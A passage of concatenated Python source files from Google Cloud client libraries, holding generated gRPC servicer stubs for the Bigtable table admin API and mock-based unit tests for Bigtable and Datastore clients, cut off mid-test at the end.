context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GenerateConsistencyToken(self, request, context):
"""This is a private alpha release of Cloud Bigtable replication. This feature
is not currently available to most Cloud Bigtable customers. This feature
might be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
Generates a consistency token for a Table, which can be used in
CheckConsistency to check whether mutations to the table that finished
before this call started have been replicated. The tokens will be available
for 90 days.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CheckConsistency(self, request, context):
"""This is a private alpha release of Cloud Bigtable replication. This feature
is not currently available to most Cloud Bigtable customers. This feature
might be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
Checks replication consistency based on a consistency token, that is, if
replication has caught up based on the conditions specified in the token
and the check request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SnapshotTable(self, request, context):
"""This is a private alpha release of Cloud Bigtable snapshots. This feature
is not currently available to most Cloud Bigtable customers. This feature
might be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
Creates a new snapshot in the specified cluster from the specified
source table. The cluster and the table must be in the same instance.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetSnapshot(self, request, context):
"""This is a private alpha release of Cloud Bigtable snapshots. This feature
is not currently available to most Cloud Bigtable customers. This feature
might be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
Gets metadata information about the specified snapshot.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListSnapshots(self, request, context):
"""This is a private alpha release of Cloud Bigtable snapshots. This feature
is not currently available to most Cloud Bigtable customers. This feature
might be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
Lists all snapshots associated with the specified cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteSnapshot(self, request, context):
"""This is a private alpha release of Cloud Bigtable snapshots. This feature
is not currently available to most Cloud Bigtable customers. This feature
might be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
Permanently deletes the specified snapshot.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_BigtableTableAdminServicer_to_server(servicer, server):
rpc_method_handlers = {
'CreateTable': grpc.unary_unary_rpc_method_handler(
servicer.CreateTable,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CreateTableRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Table.SerializeToString,
),
'CreateTableFromSnapshot': grpc.unary_unary_rpc_method_handler(
servicer.CreateTableFromSnapshot,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CreateTableFromSnapshotRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
'ListTables': grpc.unary_unary_rpc_method_handler(
servicer.ListTables,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListTablesRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListTablesResponse.SerializeToString,
),
'GetTable': grpc.unary_unary_rpc_method_handler(
servicer.GetTable,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GetTableRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Table.SerializeToString,
),
'DeleteTable': grpc.unary_unary_rpc_method_handler(
servicer.DeleteTable,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.DeleteTableRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'ModifyColumnFamilies': grpc.unary_unary_rpc_method_handler(
servicer.ModifyColumnFamilies,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ModifyColumnFamiliesRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Table.SerializeToString,
),
'DropRowRange': grpc.unary_unary_rpc_method_handler(
servicer.DropRowRange,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.DropRowRangeRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'GenerateConsistencyToken': grpc.unary_unary_rpc_method_handler(
servicer.GenerateConsistencyToken,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GenerateConsistencyTokenRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GenerateConsistencyTokenResponse.SerializeToString,
),
'CheckConsistency': grpc.unary_unary_rpc_method_handler(
servicer.CheckConsistency,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CheckConsistencyRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CheckConsistencyResponse.SerializeToString,
),
'SnapshotTable': grpc.unary_unary_rpc_method_handler(
servicer.SnapshotTable,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.SnapshotTableRequest.FromString,
response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
),
'GetSnapshot': grpc.unary_unary_rpc_method_handler(
servicer.GetSnapshot,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GetSnapshotRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Snapshot.SerializeToString,
),
'ListSnapshots': grpc.unary_unary_rpc_method_handler(
servicer.ListSnapshots,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListSnapshotsRequest.FromString,
response_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListSnapshotsResponse.SerializeToString,
),
'DeleteSnapshot': grpc.unary_unary_rpc_method_handler(
servicer.DeleteSnapshot,
request_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.DeleteSnapshotRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.bigtable.admin.v2.BigtableTableAdmin', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: gapic/v2/test_bigtable_table_admin_client_v2.py
```python
import pytest
from google.rpc import status_pb2
from google.cloud import bigtable_admin_v2
from google.cloud.bigtable_admin_v2.proto import bigtable_table_admin_pb2
from google.cloud.bigtable_admin_v2.proto import table_pb2
from google.longrunning import operations_pb2
from google.protobuf import empty_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
def __init__(self, responses=[]):
self.responses = responses
self.requests = []
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestBigtableTableAdminClient(object):
def test_create_table(self):
# Setup Expected Response
name = 'name3373707'
expected_response = {'name': name}
expected_response = table_pb2.Table(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
table = {}
response = client.create_table(parent, table_id, table)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.CreateTableRequest(
parent=parent, table_id=table_id, table=table)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_table_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
table = {}
with pytest.raises(CustomException):
client.create_table(parent, table_id, table)
def test_create_table_from_snapshot(self):
# Setup Expected Response
name = 'name3373707'
expected_response = {'name': name}
expected_response = table_pb2.Table(**expected_response)
operation = operations_pb2.Operation(
name='operations/test_create_table_from_snapshot', done=True)
operation.response.Pack(expected_response)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
source_snapshot = 'sourceSnapshot-947679896'
response = client.create_table_from_snapshot(parent, table_id,
source_snapshot)
result = response.result()
assert expected_response == result
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.CreateTableFromSnapshotRequest(
parent=parent, table_id=table_id, source_snapshot=source_snapshot)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_table_from_snapshot_exception(self):
# Setup Response
error = status_pb2.Status()
operation = operations_pb2.Operation(
name='operations/test_create_table_from_snapshot_exception',
done=True)
operation.error.CopyFrom(error)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
source_snapshot = 'sourceSnapshot-947679896'
response = client.create_table_from_snapshot(parent, table_id,
source_snapshot)
exception = response.exception()
assert exception.errors[0] == error
def test_list_tables(self):
# Setup Expected Response
next_page_token = ''
tables_element = {}
tables = [tables_element]
expected_response = {
'next_page_token': next_page_token,
'tables': tables
}
expected_response = bigtable_table_admin_pb2.ListTablesResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
paged_list_response = client.list_tables(parent)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.tables[0] == resources[0]
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.ListTablesRequest(
parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_tables_exception(self):
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
paged_list_response = client.list_tables(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_get_table(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
expected_response = {'name': name_2}
expected_response = table_pb2.Table(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
response = client.get_table(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.GetTableRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_table_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.get_table(name)
def test_delete_table(self):
channel = ChannelStub()
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
client.delete_table(name)
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.DeleteTableRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_table_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.delete_table(name)
def test_modify_column_families(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
expected_response = {'name': name_2}
expected_response = table_pb2.Table(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
modifications = []
response = client.modify_column_families(name, modifications)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.ModifyColumnFamiliesRequest(
name=name, modifications=modifications)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_modify_column_families_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
modifications = []
with pytest.raises(CustomException):
client.modify_column_families(name, modifications)
def test_drop_row_range(self):
channel = ChannelStub()
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
client.drop_row_range(name)
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.DropRowRangeRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_drop_row_range_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.drop_row_range(name)
def test_generate_consistency_token(self):
# Setup Expected Response
consistency_token = 'consistencyToken-<PASSWORD>'
expected_response = {'consistency_token': consistency_token}
expected_response = bigtable_table_admin_pb2.GenerateConsistencyTokenResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
response = client.generate_consistency_token(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.GenerateConsistencyTokenRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_generate_consistency_token_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.generate_consistency_token(name)
def test_check_consistency(self):
# Setup Expected Response
consistent = True
expected_response = {'consistent': consistent}
expected_response = bigtable_table_admin_pb2.CheckConsistencyResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
consistency_token = 'consistency<PASSWORD>'
response = client.check_consistency(name, consistency_token)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.CheckConsistencyRequest(
name=name, consistency_token=consistency_token)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_check_consistency_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
consistency_token = 'consistencyToken-<PASSWORD>'
with pytest.raises(CustomException):
client.check_consistency(name, consistency_token)
def test_snapshot_table(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
data_size_bytes = 2110122398
description_2 = 'description2568623279'
expected_response = {
'name': name_2,
'data_size_bytes': data_size_bytes,
'description': description_2
}
expected_response = table_pb2.Snapshot(**expected_response)
operation = operations_pb2.Operation(
name='operations/test_snapshot_table', done=True)
operation.response.Pack(expected_response)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
cluster = 'cluster872092154'
snapshot_id = 'snapshotId-168585866'
description = 'description-1724546052'
response = client.snapshot_table(name, cluster, snapshot_id,
description)
result = response.result()
assert expected_response == result
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.SnapshotTableRequest(
name=name,
cluster=cluster,
snapshot_id=snapshot_id,
description=description)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_snapshot_table_exception(self):
# Setup Response
error = status_pb2.Status()
operation = operations_pb2.Operation(
name='operations/test_snapshot_table_exception', done=True)
operation.error.CopyFrom(error)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
cluster = 'cluster872092154'
snapshot_id = 'snapshotId-168585866'
description = 'description-1724546052'
response = client.snapshot_table(name, cluster, snapshot_id,
description)
exception = response.exception()
assert exception.errors[0] == error
def test_get_snapshot(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
data_size_bytes = 2110122398
description = 'description-1724546052'
expected_response = {
'name': name_2,
'data_size_bytes': data_size_bytes,
'description': description
}
expected_response = table_pb2.Snapshot(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
response = client.get_snapshot(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.GetSnapshotRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_snapshot_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
with pytest.raises(CustomException):
client.get_snapshot(name)
def test_list_snapshots(self):
# Setup Expected Response
next_page_token = ''
snapshots_element = {}
snapshots = [snapshots_element]
expected_response = {
'next_page_token': next_page_token,
'snapshots': snapshots
}
expected_response = bigtable_table_admin_pb2.ListSnapshotsResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.cluster_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]')
paged_list_response = client.list_snapshots(parent)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.snapshots[0] == resources[0]
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.ListSnapshotsRequest(
parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_snapshots_exception(self):
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
parent = client.cluster_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]')
paged_list_response = client.list_snapshots(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_delete_snapshot(self):
channel = ChannelStub()
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
client.delete_snapshot(name)
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.DeleteSnapshotRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_snapshot_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
with pytest.raises(CustomException):
client.delete_snapshot(name)
```
#### File: tests/unit/test_client.py
```python
import unittest
import mock
def _make_credentials():
import google.auth.credentials
class _CredentialsWithScopes(
google.auth.credentials.Credentials,
google.auth.credentials.Scoped):
pass
return mock.Mock(spec=_CredentialsWithScopes)
@mock.patch('google.auth.transport.grpc.secure_authorized_channel')
def _make_channel(secure_authorized_channel):
from google.api_core import grpc_helpers
target = 'example.com:443'
channel = grpc_helpers.create_channel(
target, credentials=mock.sentinel.credentials)
return channel
class TestClient(unittest.TestCase):
PROJECT = 'PROJECT'
INSTANCE_ID = 'instance-id'
DISPLAY_NAME = 'display-name'
USER_AGENT = 'you-sir-age-int'
@staticmethod
def _get_target_class():
from google.cloud.bigtable.client import Client
return Client
def _make_one(self, *args, **kwargs):
return self._get_target_class()(*args, **kwargs)
def test_constructor_both_admin_and_read_only(self):
credentials = _make_credentials()
with self.assertRaises(ValueError):
self._make_one(
project=self.PROJECT, credentials=credentials,
admin=True, read_only=True)
def test__get_scopes_default(self):
from google.cloud.bigtable.client import DATA_SCOPE
client = self._make_one(
project=self.PROJECT, credentials=_make_credentials())
self.assertEqual(client._get_scopes(), (DATA_SCOPE,))
def test__get_scopes_admin(self):
from google.cloud.bigtable.client import ADMIN_SCOPE
from google.cloud.bigtable.client import DATA_SCOPE
client = self._make_one(
project=self.PROJECT, credentials=_make_credentials(),
admin=True)
expected_scopes = (DATA_SCOPE, ADMIN_SCOPE)
self.assertEqual(client._get_scopes(), expected_scopes)
def test__get_scopes_read_only(self):
from google.cloud.bigtable.client import READ_ONLY_SCOPE
client = self._make_one(
project=self.PROJECT, credentials=_make_credentials(),
read_only=True)
self.assertEqual(client._get_scopes(), (READ_ONLY_SCOPE,))
def test_credentials_getter(self):
credentials = _make_credentials()
project = 'PROJECT'
client = self._make_one(
project=project, credentials=credentials)
self.assertIs(client._credentials, credentials)
def test_project_name_property(self):
credentials = _make_credentials()
project = 'PROJECT'
client = self._make_one(
project=project, credentials=credentials, admin=True)
project_name = 'projects/' + project
self.assertEqual(client.project_path, project_name)
def test_instance_factory_defaults(self):
from google.cloud.bigtable.instance import Instance
PROJECT = 'PROJECT'
INSTANCE_ID = 'instance-id'
DISPLAY_NAME = 'display-name'
credentials = _make_credentials()
client = self._make_one(
project=PROJECT, credentials=credentials)
instance = client.instance(INSTANCE_ID, display_name=DISPLAY_NAME)
self.assertIsInstance(instance, Instance)
self.assertEqual(instance.instance_id, INSTANCE_ID)
self.assertEqual(instance.display_name, DISPLAY_NAME)
self.assertIs(instance._client, client)
def test_instance_factory_w_explicit_serve_nodes(self):
from google.cloud.bigtable.instance import Instance
PROJECT = 'PROJECT'
INSTANCE_ID = 'instance-id'
DISPLAY_NAME = 'display-name'
LOCATION_ID = 'locname'
credentials = _make_credentials()
client = self._make_one(
project=PROJECT, credentials=credentials)
instance = client.instance(
INSTANCE_ID, display_name=DISPLAY_NAME, location=LOCATION_ID)
self.assertIsInstance(instance, Instance)
self.assertEqual(instance.instance_id, INSTANCE_ID)
self.assertEqual(instance.display_name, DISPLAY_NAME)
self.assertEqual(instance._cluster_location_id, LOCATION_ID)
self.assertIs(instance._client, client)
def test_admin_client_w_value_error(self):
channel = _make_channel()
client = self._make_one(project=self.PROJECT, channel=channel)
with self.assertRaises(ValueError):
client._table_admin_client()
with self.assertRaises(ValueError):
client._instance_admin_client()
def test_list_instances(self):
from google.cloud.bigtable_admin_v2.proto import (
instance_pb2 as data_v2_pb2)
from google.cloud.bigtable_admin_v2.proto import (
bigtable_instance_admin_pb2 as messages_v2_pb2)
FAILED_LOCATION = 'FAILED'
INSTANCE_ID1 = 'instance-id1'
INSTANCE_ID2 = 'instance-id2'
INSTANCE_NAME1 = (
'projects/' + self.PROJECT + '/instances/' + INSTANCE_ID1)
INSTANCE_NAME2 = (
'projects/' + self.PROJECT + '/instances/' + INSTANCE_ID2)
channel = _make_channel()
client = self._make_one(project=self.PROJECT, channel=channel,
admin=True)
# Create response_pb
response_pb = messages_v2_pb2.ListInstancesResponse(
failed_locations=[
FAILED_LOCATION,
],
instances=[
data_v2_pb2.Instance(
name=INSTANCE_NAME1,
display_name=INSTANCE_NAME1,
),
data_v2_pb2.Instance(
name=INSTANCE_NAME2,
display_name=INSTANCE_NAME2,
),
],
)
# Patch the stub used by the API method.
bigtable_instance_stub = (
client._instance_admin_client.bigtable_instance_admin_stub)
bigtable_instance_stub.ListInstances.side_effect = [response_pb]
expected_result = response_pb
# Perform the method and check the result.
result = client.list_instances()
self.assertEqual(result, expected_result)
```
#### File: gapic/v1/test_datastore_client_v1.py
```python
import pytest
from google.cloud import datastore_v1
from google.cloud.datastore_v1 import enums
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore_v1.proto import entity_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
def __init__(self, responses=[]):
self.responses = responses
self.requests = []
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestDatastoreClient(object):
def test_lookup(self):
# Setup Expected Response
expected_response = {}
expected_response = datastore_pb2.LookupResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup Request
project_id = 'projectId-1969970175'
keys = []
response = client.lookup(project_id, keys)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datastore_pb2.LookupRequest(
project_id=project_id, keys=keys)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_lookup_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup request
project_id = 'projectId-1969970175'
keys = []
with pytest.raises(CustomException):
client.lookup(project_id, keys)
def test_run_query(self):
# Setup Expected Response
expected_response = {}
expected_response = datastore_pb2.RunQueryResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup Request
project_id = 'projectId-1969970175'
partition_id = {}
response = client.run_query(project_id, partition_id)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datastore_pb2.RunQueryRequest(
project_id=project_id, partition_id=partition_id)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_run_query_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup request
project_id = 'projectId-1969970175'
partition_id = {}
with pytest.raises(CustomException):
client.run_query(project_id, partition_id)
def test_begin_transaction(self):
# Setup Expected Response
transaction = b'-34'
expected_response = {'transaction': transaction}
expected_response = datastore_pb2.BeginTransactionResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup Request
project_id = 'projectId-1969970175'
response = client.begin_transaction(project_id)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datastore_pb2.BeginTransactionRequest(
project_id=project_id)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_begin_transaction_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup request
project_id = 'projectId-1969970175'
with pytest.raises(CustomException):
client.begin_transaction(project_id)
def test_commit(self):
# Setup Expected Response
index_updates = 1425228195
expected_response = {'index_updates': index_updates}
expected_response = datastore_pb2.CommitResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup Request
project_id = 'projectId-1969970175'
mode = enums.CommitRequest.Mode.MODE_UNSPECIFIED
mutations = []
response = client.commit(project_id, mode, mutations)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datastore_pb2.CommitRequest(
project_id=project_id, mode=mode, mutations=mutations)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_commit_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup request
project_id = 'projectId-1969970175'
mode = enums.CommitRequest.Mode.MODE_UNSPECIFIED
mutations = []
with pytest.raises(CustomException):
client.commit(project_id, mode, mutations)
def test_rollback(self):
# Setup Expected Response
expected_response = {}
expected_response = datastore_pb2.RollbackResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup Request
project_id = 'projectId-1969970175'
transaction = b'-34'
response = client.rollback(project_id, transaction)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datastore_pb2.RollbackRequest(
